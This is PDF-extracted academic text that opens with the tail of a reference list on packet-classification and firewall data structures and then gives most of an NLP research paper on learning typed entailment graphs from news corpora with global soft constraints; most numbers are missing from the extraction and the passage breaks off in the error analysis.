theory to practice. in: ieee infocom . piscataway: ieee. sahni s, kim ks. . data structures for ip lookup with bursty access patterns. available at https://www.cise.ufl.edu/~sahni/papers/burstyc.pdf. sen sjipl. . some observations on skip-lists. information processing letters ( ): – doi . / - ( ) -h. sleator dd, tarjan re. . self-adjusting binary search trees. journal of the acm ( ): – doi . / . . srinivasan v, suri s, varghese g. . packet classification using tuple space search. acm sigcomm computer communication review ( ): – doi . / . . taylor de. . survey and taxonomy of packet classification techniques. acm computing surveys (csur) ( ): – doi . / . . taylor de, turner jsjiaton. . classbench: a packet classification benchmark. ieee/acm transactions on networking ( ): – . tessier r, wolf t, hu k, chandrikakutty h. . reconfigurable network router secu- rity. in: gaillardon p-e, ed. reconfigurable logic: architecture, tools, and applications. boca raton: crc press. trabelsi z, masud mm, ghoudi kjc, security. . statistical dynamic splay tree filters towards multilevel firewall packet filtering enhancement. computers & security : – doi . /j.cose. . . . trabelsi z, zeidan s. . splay trees based early packet rejection mechanism against dos traffic targeting firewall default security rule. in: ieee international workshop on information forensics and security. piscataway: ieee. trabelsi z, zeidan s. . multilevel early packet filtering technique based on traffic statistics and splay trees for firewall performance improvement. in: ieee international conference on communications (icc). piscataway: ieee. zeidan s, trabelsi z. . a survey on firewall’s early packet rejection techniques. in: international conference on innovations in information technology. piscataway: ieee. zhong t, geng j, zhao k. . an efficient authenticated data structure for dynamic data set based on b+ tree. in: international conference on communications, circuits and systems (icccas). piscataway: ieee. khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.cise.ufl.edu/~sahni/papers/burstyc.pdf http://dx.doi.org/ . / - ( ) -h http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.cose. . . http://dx.doi.org/ . /peerj-cs. edinburgh research explorer learning typed entailment graphs with global soft constraints citation for published version: hosseini, smj, chambers, n, reddy, s, holt, xr, cohen, s, johnson, m & steedman, m , 'learning typed entailment graphs with global soft constraints', transactions of the association for computational linguistics, vol. , pp. - . https://doi.org/ . /tacl_a_ digital object identifier (doi): . /tacl_a_ link: link to publication record in edinburgh research explorer document version: peer reviewed version published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. https://doi.org/ . /tacl_a_ https://doi.org/ . /tacl_a_ https://www.research.ed.ac.uk/portal/en/publications/learning-typed-entailment-graphs-with-global-soft-constraints(f e cde - adb- f -aeab- ff ).html learning typed entailment graphs with global soft constraints mohammad javad hosseini?§ nathanael chambers?? siva reddy† xavier r. holt‡ shay b. cohen? mark johnson‡ and mark steedman? ?university of edinburgh §the alan turing institute, uk ??united states naval academy †stanford university ‡macquarie university javad.hosseini@ed.ac.uk, nchamber@usna.edu, sivar@stanford.edu {xavier.ricketts-holt,mark.johnson}@mq.edu.au {scohen,steedman}@inf.ed.ac.uk abstract this paper presents a new method for learn- ing typed entailment graphs from text. we extract predicate-argument structures from multiple-source news corpora, and compute local distributional similarity scores to learn entailments between predicates with typed arguments (e.g., person contracted disease). previous work has used transitivity con- straints to improve local decisions, but these constraints are intractable on large graphs. we instead propose a scalable method that learns globally consistent similarity scores based on new soft constraints that consider both the structures across typed entailment graphs and inside each graph. learning takes only a few hours to run over k predicates and our results show large im- provements over local similarity scores on two entailment datasets. we further show improvements over paraphrases and entail- ments from the paraphrase database, and prior state-of-the-art entailment graphs. we show that the entailment graphs improve performance in a downstream task. introduction recognizing textual entailment and paraphrasing is critical to many core natural language process- ing applications such as question-answering and semantic parsing. the surface form of a sentence that answers a question such as “does verizon own yahoo?” frequently does not directly cor- respond to the form of the question, but is rather a paraphrase or an expression such as “verizon bought yahoo”, that entails the answer. the lack of a well-established form-independent semantic representation for natural language is the most im- portant single obstacle to bridging the gap between queries and text resources. this paper seeks to learn meaning postulates (e.g., buying entails owning) that can be used to t =person,t =location visit arrive in leave leave for t =company,t =company own 's acquisition of buy figure : examples of typed entailment graphs for arguments of types company,company and per- son,location. augment the standard form-dependent semantics. our immediate goal is to learn entailment rules be- tween typed predicates with two arguments, where the type of each predicate is determined by the types of its arguments. we construct typed entail- ment graphs, with typed predicates as nodes and entailment rules as edges. figure shows simple examples of such graphs with arguments of types company,company and person,location. entailment relations are detected by computing a similarity score between the typed predicates based on the distributional inclusion hypothesis, which states that a word (predicate) u entails an- other word (predicate) v if in any context that u can be used so can be v (dagan et al., ; gef- fet and dagan, ; herbelot and ganesalingam, ; kartsaklis and sadrzadeh, ). most pre- vious work has taken a “local learning” approach (lin, ; weeds and weir, ; szpektor and dagan, ; schoenmackers et al., ), i.e., learning entailment rules independently from each other. one problem facing local learning approaches is that many correct edges are not identified be- cause of data sparsity and many wrong edges are spuriously identified as valid entailments. a “global learning” approach, where dependencies between entailment rules are taken into account, can improve the local decisions significantly. be- rant et al. ( ) imposed transitivity constraints on the entailments, such that the inclusion of rules i→j and j→k implies that of i→k. while they showed transitivity constraints to be effective in learning entailment graphs, the integer linear pro- gramming (ilp) solution of berant et al. ( ) is not scalable beyond a few hundred nodes. in fact, the problem of finding a maximally weighted transitive subgraph of a graph with arbitrary edge weights is np-hard (berant et al., ). this paper instead proposes a scalable solution that does not rely on transitivity closure, but in- stead uses two global soft constraints that main- tain structural similarity both across and within each typed entailment graph (figure ). we intro- duce an unsupervised framework to learn globally consistent similarity scores given local similarity scores (§ ). our method is highly parallelizable and takes only a few hours to apply to more than k predicates. , our experiments (§ ) show that the global scores improve significantly over local scores and outperform state-of-the-art entailment graphs on two standard entailment rule datasets (berant et al., ; holt, ). we ultimately intend the typed entailment graphs to provide a resource for entailment and paraphrase rules for use in seman- tic parsing and open domain question-answering, as has been done for similar resources such as the paraphrase database (ppdb; ganitkevitch et al., ; pavlick et al., ) in wang et al. ( ); dong et al. ( ). with that end in view, we have included a comparison with ppdb in our evaluation on the entailment datasets. we also show that the learned entailment rules improve performance on a question-answering task (§ ) with no tuning or prior knowledge of the task. related work our work is closely related to berant et al. ( ), where entailment graphs are learned by imposing transitivity constraints on the entailment relations. however, the exact solution to the problem is not scalable beyond a few hundred predicates, while the number of predicates that we capture is two orders of magnitude larger (§ ). hence, it is nec- essary to resort to approximate methods based on we performed our experiments on a -core . ghz machine with gb of ram. our code, extracted binary relations and the learned entailment graphs are available at https://github.com/mjhosseini/entgraph. predicates inside each clique in the entailment graphs are considered to be paraphrases. assumptions concerning the graph structure. be- rant et al. ( ) and berant et al. ( ) propose tree-node-fix (tnf), an approximation method that scales better by additionally assuming the en- tailment graphs are “forest reducible", where a predicate cannot entail two (or more) predicates j and k such that neither j→k nor k→j (frg as- sumption). however, the frg assumption is not correct for many real-world domains. for exam- ple, a person visiting a place entails both arriving at that place and leaving that place, while the lat- ter do not necessarily entail each other. our work injects two other types of prior knowledge about the structure of the graph that are less expensive to incorporate and yield better results on entailment rule datasets. abend et al. ( ) learn entailment relations over multi-word predicates with different levels of compositionality. pavlick et al. ( ) add variety of relations, including entailment, to phrase pairs in ppdb. this includes a broader range of entail- ment relations such as lexical entailment. in con- trast to our method, these works rely on supervised data and take a local learning approach. another related strand of research is link pre- diction (socher et al., ; bordes et al., ; riedel et al., ; yang et al., ; trouil- lon et al., ; dettmers et al., ), where the source data are extractions from text, facts in knowledge bases, or both. unlike our work, which directly learns entailment relations between pred- icates, these methods aim at predicting the source data, i.e., whether two entities have a particular relationship. the common wisdom is that en- tailment relations are by-product of these meth- ods (riedel et al., ). however, this assump- tion has not usually been explicitly evaluated. explicit entailment rules provide explainable re- sources that can be used in downstream tasks. our experiments show that our method signifi- cantly outperforms a state-of-the-art link predic- tion method. computing local similarity scores we first extract binary relations as predicate- argument pairs using a combinatory categorial grammar (ccg; steedman, ) semantic parser (§ . ). we map the arguments to their wikipedia urls using a named entity linker (§ . ). we ex- tract types such as person and disease for each ar- gument (§ . ). we then compute local similarity scores between predicate pairs (§ . ). . relation extraction the semantic parser of reddy et al. ( ), graphparser, is run on the newsspike corpus (zhang and weld, ) to extract binary re- lations between a predicate and its arguments from sentences. graphparser uses ccg syn- tactic derivations and λ-calculus to convert sen- tences to neo-davisonian semantics, a first-order logic that uses event identifiers (parsons, ). for example, for the sentence, obama visited hawaii in , graphparser produces the logi- cal form ∃e.visit (e, obama)∧visit (e, hawaii)∧ visitin(e, ), where e denotes an event. we will consider a relation for each pair of ar- guments, hence, there will be three rela- tions for the above sentence: visit , with ar- guments (obama,hawaii), visit ,in with argu- ments (obama, ) and visit ,in with arguments (hawaii, ). we currently only use extracted relations that involve two named entities or one named entity and a noun. we constrain the rela- tions to have at least one named entity to reduce ambiguity in finding entailments. we perform a few automatic post-processing steps on the output of the parser. first, we normal- ize the predicates by lemmatization of their head words. passive predicates are mapped to active ones and we extract negations and particle verb predicates. next, we discard unary relations and relations involving coordination of arguments. fi- nally, whenever we see a relation between a sub- ject and an object, and a relation between object and a third argument connected by a prepositional phrase, we add a new relation between the subject and the third argument by concatenating the rela- tion name with the object. for example, for the sentence china has a border with india, we ex- tract a relation have border ,with between china and india. we perform a similar process for pps attached to vps. most of the light verbs and multi- word predicates will be extracted by the above post-processing (e.g., take care ,of ) which will re- cover many salient ternary relations. while entailments and paraphrasing can bene- fit from n-ary relations, e.g., person visits a lo- cation in a time, we currently follow previous work (lewis and steedman, a; berant et al., ) in confining our attention to binary rela- tions, leaving the construction of n-ary graphs to future work. . linking and typing arguments entailment and paraphrasing depend on context. while using exact context is impractical in form- ing entailment graphs, many authors have used the type of the arguments to disambiguate polysemous predicates (berant et al., , ; lewis and steedman, a; lewis, ). typing also re- duces the size of the entailment graphs. since named entities can be referred to in many different ways, we use a named entity linking tool to normalize the named entities. in the ex- periments below, we use aidalight (nguyen et al., ), a fast and accurate named entity linker, to link named entities to their wikipedia urls (if any). we thus type all entities that can be grounded in wikipedia. we first map the wikipedia url of the entities to freebase (bol- lacker et al., ). we select the most notable type of the entity from freebase and map it to figer types (ling and weld, ) such as build- ing, disease, person and location, using only the first level of the figer type hierarchy. for exam- ple, instead of event/sports_event, we use event as type. if an entity cannot be grounded in wikipedia or its freebase type does not have a mapping to figer, we assign the default type thing to it. . local distributional similarities for each typed predicate (e.g., visit , with types person,location), we extract a feature vector. we use as feature types the set of argument pair strings (e.g., obama-hawaii) that instantiate the binary relations of the predicates. the value of each fea- ture is the pointwise mutual information (pmi) be- tween the predicate and the feature. we use the feature vectors to compute three local similarity scores (both symmetric and directional) between typed predicates: weeds (weeds and weir, ), lin (lin, ), and balanced inclusion (binc; szpektor and dagan, ) similarities. learning globally consistent entailment graphs we learn globally consistent similarity scores based on local similarity scores. the global scores will be used to form typed entailment graphs. types out of figer types . problem formulation let t be a set of types and p be a set of predicates. we denote by v̄ (t , t ) the set of typed predicates p(:t , :t ), where t , t ∈ t and p ∈ p . each p(:t , :t ) ∈ v̄ (t , t ) takes as input arguments of types t and t . an example of a typed predicate is win , (:team,:event) that can be instantiated with win , (seahawks:team,super bowl:event). we define v (t , t ) = v̄ (t , t ) ∪ v̄ (t , t ). we often denote elements of v (t , t ) by i, j and k, where each element is a typed predicate as above. for an i=p(:t , :t ) ∈ v (t , t ), we denote by π(i)=p, τ (i)=t and τ (i)=t . we compute distributional similarities between predi- cates with the same argument types. we denote by w (t , t ) ∈ [ , ]|v (t ,t )|×|v (t ,t )| the (sparse) matrix containing all local similarity scores w ij between predicates i and j with types t and t , where |v (t , t )| is the size of v (t , t ). predicates can entail each other with the same argument order (direct) or in the reverse order, i.e., p(:t , :t ) might entail q(:t , :t ) or q(:t , :t ). for the graphs with the same types (e.g., t =t =person), we keep two copies of the pred- icates one for each of the possible orderings. this allows us to model entailments with reverse argu- ment orders, e.g., is son of , (:person ,:person ) → is parent of , (:person ,:person ). we define v = ⋃ t ,t v (t , t ), the set of all typed predicates, and w as a block- diagonal matrix consisting of all the local sim- ilarity matrices w (t , t ). similarly, we de- fine w(t , t ) and w as the matrices consisting of globally consistent similarity scores wij we wish to learn. the global similarity scores are used to form entailment graphs by thresholding w. for a δ > , we define typed entailment graphs as gδ(t , t ) = ( v (t , t ),eδ(t , t ) ) , where v (t , t ) are the nodes and e(t , t ) = {(i,j)|i,j ∈ v (t , t ),wij ≥ δ} are the edges of the entailment graphs. . learning algorithm existing approaches to learn entailment graphs from text miss many correct edges because of data sparsity, i.e., the lack of explicit evidence in the corpus that a predicate i entails another predicate j. the goal of our method is to use evidence for each similarity measure, we define one separate ma- trix and run the learning algorithm separately, but for simplic- ity of notation, we do not show the similarity measure names. t =living_thing,t =diseaset =government_agency,t =event !(trigger,(t ,t ),(t ,t )) t =medicine,t =disease(b) treat cause cure useful for trigger cause trigger (a) figure : learning entailments that are consistent (a) across different but related typed entailment graphs and (b) within each graph. ≤ β ≤ determines how much different graphs are related. the dotted edges are missing, but will be recovered by considering relation- ships shown by across-graph (red) and within-graph (light blue) connections. from the existing edges that have been assigned high confidence to predict missing ones, and re- move spurious edges. we propose two global soft constraints that maintain structural similarity both across and within each typed entailment graph. the constraints are based on the following two ob- servations. first, it is standard to learn a separate typed en- tailment graph for each (plausible) type-pair be- cause arguments provide necessary disambigua- tion for predicate meaning (berant et al., , ; lewis and steedman, a,b; berant et al., ). however, many entailment relations for which we have direct evidence only in a few sub- graphs may in fact apply over many others (fig- ure a). for example, we may not have found di- rect evidence that mentions of a living_thing (e.g., a virus) triggering a disease are accompanied by mentions of the living_thing causing that disease (because of data sparsity), whereas we have found that mentions of a government_agency triggering an event are reliably accompanied by mentions of causing that event. while we show that typing is necessary to learning entailments (§ ), we propose to learn all typed entailment graphs jointly. second, we encourage paraphrase predicates (where i→j and j→i) to have the same patterns of entailment (figure b), i.e. to entail and be entailed by the same predicates, global soft con- straints that we call paraphrase resolution. using these soft constraint, a missing entailment (e.g., medicine treats disease → medicine is useful for disease) can be identified by considering the en- j(w ≥ , ~β ≥ ) = lwithingraph + lcrossgraph + lpresolution + λ ‖w‖ ( ) lwithingraph = ∑ i,j∈v (wij −w ij) ( ) lcrossgraph = ∑ i,j∈v ∑ (i′,j′)∈ n(i,j) β ( π(i), ( τ (i),τ (i) ) , ( τ (i ′),τ (i ′) )) (wij −wi′j′ ) + λ ‖~ − ~β‖ ( ) lpresolution = ∑ t ,t ∈t ∑ i,j,k∈v (t ,t ) k =i,k =j iε(wij)iε(wji) [ (wik −wjk) + (wki −wkj) ] ( ) figure : the objective function to jointly learn global scores w and the compatibility function β, given local scores w . lwithingraph encourages global and local scores to be close; lcrossgraph encourages similarities to be consistent between different typed entailment graphs; lpresolution encourages paraphrase predicates to have the same pattern of entailment. we use an ` regularization penalty to remove entailments with low confidence. tailments of a paraphrase predicate (e.g., medicine cures disease → medicine is useful for disease). sharing entailments across different typed en- tailment graphs is only semantically correct for some predicates and types. in order to learn when we can generalize an entailment from one graph to another, we define a compatibility func- tion β : p × (t×t) × (t×t) → [ , ]. the function is defined for a predicate and two type pairs (figure a). it specifies the extent of com- patibility for a single predicate between different typed entailment graphs, with being completely compatible and being irrelevant. in particu- lar β ( p, (t , t ), (t ′ , t ′ ) ) determines how much we expect the outgoing edges of p(:t , :t ) and p(:t′ , :t ′ ) to be similar. we constrain β to be sym- metric between t , t and t′ , t ′ as compatibility of outgoing edges of p(:t , :t ) with p(:t′ , :t ′ ) should be the same as p(:t′ , :t ′ ) with p(:t , :t ). we de- note by ~β, a vectorization consisting of the values of β for all possible input predicates and types. note that the global similarity scores w and the compatibility function ~β are not known in ad- vance. given local similarity scores w , we learn w and ~β jointly. we minimize the loss func- tion defined in eq. which consists of three soft constraints defined below and an ` regularization term (figure ). lwithingraph. eq. encourages global scores wij to be close to local scores w ij, so that the global scores will not stray too far from the origi- nal scores. lcrossgraph. eq. encourages each predicate’s entailments to be similar across typed entailment graphs (figure a) if the predicates have similar neighbors. we penalize the difference of entail- ments in two different graphs, when the compat- ibility function is high. for each pair of typed predicates (i,j) ∈ v (t , t ), we define a set of neighbors (predicates with different types): n(i,j) = { (i′,j′) ∈ v (t′ , t ′ )|t ′ , t ′ ∈ t, (i′,j′) = (i,j),π(i) = π(i′),π(j) = π(j′), a(i,j) = a(i′,j′) } , ( ) where a(i,j) is true if the argument orders of i and j match, and false otherwise. for each (i′,j′) ∈ n(i,j), we penalize the difference of entailments by adding the term β(·)(wij − wi′j′ ) . we add a prior term on ~β as λ ‖~ −~β‖ , where ~ is a vector of the same size as ~β with all s. without the prior term (i.e., λ = ), all the elements of ~β will be- come zero. increasing λ will keep (some of the) elements of ~β non-zero and encourages communi- cations between related graphs. lpresolution. eq. denotes the paraphrase reso- lution global soft constraints that encourage para- phrase predicates to have the same patterns of en- tailments (figure b). the function iε(x) equals x if x > ε and zero, otherwise. unlike lcrossgraph in eq. , eq. operates on the edges within each graph. if both wij and wji are high, their incoming and outgoing edges from/to nodes k are encour- aged to be similar. we name this global constraint, in our experiments, we set ε = . . smaller values of ε yield similar results, but learning is slower. paraphrase resolution, since it might add missing links (e.g., i→k) if i and j are paraphrases of each other and j→k, or break the paraphrase relation, if the incoming and outgoing edges are very dif- ferent. we impose an ` penalty on the elements of w as λ ‖w‖ , where λ is a nonnegative tuning hyperparameter that controls the strength of the penalty applied to the elements of w. this term removes entailments with low confidence from the entailment graphs. note that eq. has w and average of w across different typed entailment graphs (§ . ) as its special cases. the former is achieved by setting λ =λ = and ε= and the lat- ter by λ = , λ =∞ and ε= . we do not explicitly weight the different components of the loss func- tion, as the effect of lcrossgraph and lpresolution can be controlled by λ and ε, respectively. eq. can be interpreted as an inference prob- lem in a markov random field (mrf) (kinder- mann and snell, ), where the nodes of the mrf are the global scores wij and the parame- ters β ( p, (t , t ), (t ′ , t ′ ) ) . the mrf will have five log-linear factor types: one unary factor type for lwithingraph, one three-variable factor type for the first term of lcrossgraph and a unary factor type for the prior on ~β, one four-variable factor type for lpresolution and a unary factor type for the ` regularization term. figure shows an example factor graph (unary factors are not shown for sim- plicity). we learn w and ~β jointly using a message passing approach based on the block coordinate descent method (xu and yin, ) . we ini- tialize w = w . assuming that we know the global similarity scores w, we learn how much the entailments are compatible between different types (~β) and vice versa. given w fixed, each wij sends messages to the corresponding β(·) el- ements, which will be used to update ~β. given ~β fixed, we do one iteration of learning for each wij. each β(·) and wij elements send messages to the related elements in w, which will be in turn up- dated. based on the update rules (appendix a), we always have wij ≤ and ~β ≤~ . each iteration of the learning method takes o ( ‖w‖ |t| + ∑ i∈v (‖wi:‖ +‖w:i‖ ) ) time, where ‖w‖ is the number of nonzero elements of w (number of edges in the current graph), |t| is the number of types and ‖wi:‖ (‖w:i‖ ) is the number of nonzero elements of the ith row (col- umn) of the matrix (out-degree and in-degree of the node i). in practice, learning converges af- ter iterations of full updates. the method is highly parallelizable, and our efficient implemen- tation does the learning in only a few hours. experimental setup we extract binary relations from a multiple-source news corpus (§ . ) and compute local and global scores. we form entailment graphs based on the similarity scores and test our model on two entail- ment rules datasets (§ . ). we then discuss pa- rameter tuning (§ . ) and baseline systems (§ . ). . training corpus: multiple-source news we use the multiple-source newsspike corpus of zhang and weld ( ). newsspike was deliber- ately built to include different articles from differ- ent sources describing identical news stories. they scraped rss news feeds from january-february and linked them to full stories collected through a web search of the rss titles. the cor- pus contains k news articles ( m sentences). since this corpus contains multiple sources cover- ing the same events, it is well-suited to our purpose of learning entailment and paraphrase relations. we extracted m binary relations using the procedure in section . . in our experiments, we used two cutoffs within each typed subgraph to re- duce the effect of noise in the corpus: ( ) remove any argument-pair that is observed with less than c = unique predicates; ( ) remove any predi- cate that is observed with less than c = unique argument-pairs. this leaves us with |p |= k unique predicates in entailment graphs. the maximum graph size is k nodes and the to- tal number of non-zero local scores in all graphs is m. in the future, we plan to test our method on an even larger corpus, but preliminary exper- iments suggest that data sparsity will persist re- gardless of the corpus size, due to the power law distribution of the terms. we compared our ex- tractions qualitatively with stanford open ie (et- zioni et al., ; angeli et al., ). our ccg- based extraction generated noticeably better rela- in our experiments, the total number of edges is ≈ . |v | and most of predicate pairs are seen in less than subgraphs, instead of |t| . there are graphs with more than k nodes, graphs with k to k nodes, and graphs with k to k nodes. tions for longer sentences with long-range depen- dencies such as those involving coordination. . evaluation entailment datasets levy/holt’s entailment dataset levy and da- gan ( ) proposed a new annotation method (and a new dataset) for collecting relational in- ference data in context. their method removes a major bias in other inference datasets such as zeichner’s (zeichner et al., ), where candi- date entailments were selected using a directional similarity measure. levy & dagan form ques- tions of the type which city (qtype), is located near (qrel), mountains (qarg)? and provide possible an- swers of the form kyoto (aanswer), is surrounded by (arel), mountains (aarg). annotators are shown a question with multiple possible answers, where aanswer is masked by qtype to reduce the bias to- wards world knowledge. if the annotator indicates the answer as true (false), it is interpreted that the predicate in the answer entails (does not entail) the predicate in the question. while the levy entailment dataset removes bias, a recent evaluation identified high labeling error rate for entailments that hold only in one di- rection (holt, ). holt analyzed positive examples and showed that % of the claimed en- tailments are correct only in the opposite direc- tion, while % do not entail in any direction. holt ( ) designed a task to crowd-annotate the dataset by a) adding the reverse entailment (q→a) for each original positive entailment (a→q) in levy’s dataset; and b) directly asking the an- notators if a positive example (or its reverse) is an entailment or not (as opposed to relying on a factoid question). we test our method on this re- annotated dataset of , examples ( , pos- itive and , negative), which we refer to as levy/holt. we run our ccg based binary rela- tion extraction on the examples and perform our typing procedure (§ . ) on aanswer (e.g., kyoto) and aarg (e.g., mountains) to find the types of the arguments. we split the re-annotated dataset into dev ( %) and test ( %) such that all the exam- ples with the same qtype and qrel are assigned to only one of the sets. berant’s entailment dataset berant et al. ( ) annotated all the edges of typed entail- ment graphs based on the predicates in their cor- pus. the dataset contains , edges (positive), www.github.com/xavi-ai/relational-implication-dataset and , non-edges (negative). we evaluate our method on all the examples of berant’s entailment dataset. the types of this dataset do not match with figer types, but we perform a simple hand- mapping between their types and figer types. . parameter tuning we selected λ =. and ε=. based on prelim- inary experiments on the dev set of levy/holt’s dataset. the hyperparameter λ is selected from { , . , . , . , , . , , ,∞}. we do not tune λ for berant’s dataset. we instead use the selected value based on the levy/holt dev set. in all our experiments, we remove any local score w ij < . . we show precision-recall curves by changing the threshold δ on the similarity scores. . comparison we test our model by ablation of the global soft constraints lcrossgraph and lpresolution, testing simple baselines to resolve sparsity and compar- ing to the state-of-the-art resources. we also com- pare with two distributional approaches that can be used to predict predicate similarity. we com- pare the following models and resources. cg_pr is our novel model with both global soft constraints lcrossgraph and lpresolution. cg is our model without lpresolution. local is the lo- cal distributional similarities without any change. avg is the average of local scores across all the entailment graphs that contain both predicates in an entailment of interest. we set λ = ∞ which forces all the values of ~β to be , hence resulting in a uniform average of local scores. untyped scores are local scores learned without types. we set the cutoffs c = and c = to have a graph with total number of edges similar to the typed entail- ment graphs. conve scores are cosine similarities of low- dimensional predicate representations learned by conve (dettmers et al., ), a state-of-the-art model for link prediction. conve is a multi-layer convolutional network model that is highly pa- rameter efficient. we learn -dimensional vec- tors for each predicate (and argument) by apply- ing conve to the set of extractions of the above untyped graph. we learned embeddings for each predicate and its reverse to handle examples where the argument order of the two predicates are differ- mappings in total (e.g., animal to living_thing). the selected value was usually around . . ent. additionally, we tried transe (bordes et al., ), another link prediction method which de- spite of its simplicity, produces very competitive results in knowledge base completion. however, we do not present its full results as they were worse than conve. ppdb is based on the paraphrase database (ppdb) of pavlick et al. ( ). we accept an example as entailment if it is labeled as a para- phrase or entailment in the ppdb xl lexical or phrasal collections. berant_ilp is based on the entailment graphs of berant et al. ( ). for berant’s dataset, we directly compared our results to the ones reported in berant et al. ( ). for levy/holt’s dataset, we used publicly available entailment rules derived from berant et al. ( ) that gives us one point of precision and recall in the plots. while the rules are typed and can be ap- plied in a context sensitive manner, ignoring the types and applying the rules out of context yields much better results (levy and dagan, ). this is attributable to both the non-standard types used by berant et al. ( ) and also the general data sparsity issue. in all our experiments, we first test a set of rule-based constraints introduced by berant et al. ( ) on the examples before the prediction by our methods. in the experiments on levy/holt’s dataset, in order to maintain compatibility with levy and dagan ( ), we also run the lemma based heuristic process used by them before ap- plying our methods.we do not apply the lemma based process on berant’s dataset in order to com- pare with berant et al’s ( ) reported results di- rectly. in experiments with cg_pr and cg, if the typed entailment graph corresponding to an exam- ple does not have one or both predicates, we resort to the average score between all typed entailment graphs. results and discussion to test the efficacy of our globally consistent en- tailment graphs, we compare them with the base- line systems in section . . we test the effect of approximating transitivity constraints in section we also tried the average of glove embeddings (pen- nington et al., ) of the words in each predicate, but the results were worse than conve. we also tested the largest collection (xxxl) , but the precision was very low on berant’s dataset (below %). we also tested (berant et al., ), but do not report the results as they are very similar. local untyped avg cg cg_pr levy/holt’s dataset binc . . . . . lin . . . . . weed . . . . . conve - . - - - berant’s dataset binc . . . . . lin . . . . . weed . . . . . conve - . - - - table : area under precision-recall curve (for pre- cision > . ) for different variants of similarity mea- sures: local, untyped, avg, crossgraph (cg) and crossgraph + presolution (cg_pr). we report results on two datasets. bold indicates stat significance (see text). . . section . concerns error analysis. . globally consistent entailment graphs we test our method using three distributional similarity measures: weeds similarity (weeds and weir, ), lin similarity (lin, ) and balanced inclusion (binc; szpektor and dagan, ). the first two similarity measures are sym- metric, while binc is directional. figures a and b show precision-recall curves of the differ- ent methods on levy/holt’s and berant’s datasets, respectively, using binc. we show the full curve for binc as it is directional and on the development portion of levy/holt’s dataset, it yields better re- sults than weeds and lin. in addition, table shows the area under the precision-recall curve (auc) for all variants of the three similarity measures. note that each method covers a different range of precisions and recalls. we compute auc for precisions in the range [ . , ], because predictions with precision better than random guess are more important for end applications such as question-answering and semantic parsing. for each similarity measure, we tested statistical significance between the methods using bootstrap resampling with k experiments (efron and tibshirani, ; koehn, ). in ta- ble , the best result for each dataset and similarity measure is boldfaced. if the difference of another model with the best result is not significantly dif- ferent with p-value < . , the second model is also boldfaced. weeds similarity is the harmonic average of weeds pre- cision and weeds recall, hence a symmetric measure. (a) pr ec is io n recall recall levy/holt’s dataset berant’s dataset pr ec is io n (d)(c) (b) figure : comparison of globally consistent entailment graphs to the baselines on levy/holt’s (a) and berant’s (b) datasets. the results are compared to graphs learned by forest reducible graph assumption on levy/holts’s (c) and berant’s (d) datasets. among the distributional similarities based on binc, binc_cg_pr outperforms all the other models in both datasets. in comparison to binc score’s auc, we observe more than % im- provement on levy/holt’s dataset and about % improvement on berant’s. given the consistent gains, our proposed model appears to alleviate the data sparsity and the noise inherent to lo- cal scores. our method also outperforms ppdb and berant_ilp on both datasets. the second best performing model is binc_cg, which im- proves the results significantly, especially on be- rant’s dataset, over the binc_avg (auc of . vs . ). this confirms that learning what subset of entailments should be generalized across differ- ent typed entailment graphs (~β) is effective. the untyped models yield a single large entail- ment graph. it contains (noisy) edges that are not found in smaller typed entailment graphs. despite the noise, untyped models for all three similarity measures still perform better than the typed ones in terms of auc. however, they do worse in the high-precision range. for example, binc_untyped is worse than binc for precision > . . the avg models do surprisingly well (only about . to . below cg_pr in terms of auc), but note that only a subset of the typed entailment graphs might have (untyped) predicates p and q of interest (usually not more than typed entailment graphs out of graphs). therefore, the avg models are gen- erally expected to outperform the untyped ones (with only one exception in our experiments), as typing has refined the entailments and averaging just improves the recall. comparison of cg_pr with cg models confirms that explicitly encour- aging paraphrase predicates to have the same pat- terns of entailment is effective. it improves the results for binc score, which is a directional sim- ilarity measure. we also tested applying the para- phrase resolution soft constraints alone, but the differences with the local scores were not statis- tically significant. this suggests that the para- phrase resolution is more helpful when similarities are transferred between graphs, as this can cause inconsistencies around the predicates with trans- ferred similarities, which are then resolved by the paraphrase resolution constraints. the results of the distributional representations learned by conve are worse than most other meth- ods. we attribute this outcome to the fact that a) while entailment relations are directional, these methods are symmetric; b) the learned embed- dings are optimized for tasks other than entailment or paraphrase detection; and c) the embeddings are learned regardless of argument types. how- ever, even the binc_untyped baseline outperforms conve, showing that it is important to use a di- rectional measure that directly models entailment. we hypothesize that learning predicate represen- tations based on the distributional inclusion hy- potheses which do not have the above limitations might yield better results. . effect of transitivity constraints our largest graph has k nodes, we thus tested approximate methods instead of the ilp to close entailment relations under transitivity (§ ). the approximate tnf method of berant et al. ( ) did not scale to the size of our graphs with moder- ate sparsity parameters. berant et al. ( ) also present a heuristic method, high-to-low forest reducible graph (htl-frg), which gets slightly better results than tnf on their dataset, and which scales to graphs of the size we work with. we applied the htl-frg method to the globally consistent similarity scores (binc_cg_pr_htl) and changed the threshold on the scores to get a precision-recall curve. figures c and d show the results of this method on levy/holt’s and berant’s datasets. our experiments show, in contrast to the results of berant et al. ( ), that the htl-frg method leads to worse results when applied to our global scores. this result is caused both by the use of heuristic methods in place of globally optimizing via ilp, and by the removal of many valid edges arising from the fact that the frg assumption is not correct for many real-world domains. tnf did not converge after two weeks for threshold δ = . . for δ = . (precisions higher than %), it converged, but with results slightly worse than htl-frg on both datasets. error type example false positive spurious correlation ( %) microsoft released internet ex- plorer → internet explorer was developed by microsoft relation nor- malization ( %) the pain may be relieved by as- pirin → the pain can be treated with aspirin lemma based process & parsing ( %) president kennedy came to texas → president kennedy came from texas false negative sparsity ( %) cape town lies at the foot of mountains → cape town is lo- cated near mountains wrong label & parsing ( %) horses are imported from aus- tralia → horses are native to aus- tralia table : examples of different error categories and relative frequencies. the cause of errors is boldfaced. . error analysis we analyzed false positive (fp) and false negative (fn) randomly selected examples (using binc_cg_st results on levy/holt’s dataset and at the precision level of berant_ilp, i.e. . ). we present our findings in table . most of the fn errors are due to data sparsity, but a few errors are due to wrong labeling of the data and parsing er- rors. more than half of the fp errors are because of spurious correlations in the data that are captured by the similarity scores, but are not judged to con- stitute entailment by the human judges. about one third of 